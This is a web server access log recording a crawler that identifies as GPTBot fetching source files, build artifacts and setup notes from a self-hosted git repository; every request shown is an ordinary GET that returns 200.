"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject" -[17/Feb/2026:14:41:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 13031] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher" -[17/Feb/2026:14:41:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:41:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10190] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build" -[17/Feb/2026:14:41:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 9883] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:14:41:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10772] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:41:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:14:41:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:14:41:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13348] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build" -[17/Feb/2026:14:41:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 108760] [Gzip 18.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:14:41:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19492] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build" -[17/Feb/2026:14:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 10890] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:14:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11405] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build" -[17/Feb/2026:14:41:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 9885] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:14:41:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" [Client 74.7.227.38] [Length 9868] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:14:41:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build" -[17/Feb/2026:14:41:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:41:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 1494] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:14:41:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10769] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:41:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:41:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13480] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:41:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 260846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:14:41:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:41:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -[17/Feb/2026:14:41:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 2813995] [Gzip 25.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -[17/Feb/2026:14:41:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:41:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:14:41:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 153759] [Gzip 31.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:14:41:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 11771] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:14:41:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 12526] [Gzip 5.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:14:41:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 9886] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:14:41:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 11804] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:14:41:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10191] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build" -[17/Feb/2026:14:41:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10747] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:41:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 1494] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:14:41:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" [Client 74.7.227.38] [Length 10674] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build" -[17/Feb/2026:14:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 9912] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:14:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:41:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?display=rendered" [Client 74.7.227.38] [Length 10882] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png" -[17/Feb/2026:14:41:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 15179] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:14:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 15177] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:14:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 15179] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:14:41:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 15146] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:41:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 72034] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" -[17/Feb/2026:14:41:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 72685] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" -[17/Feb/2026:14:41:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71647] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" -[17/Feb/2026:14:41:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 108786] [Gzip 18.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:14:41:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 10915] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 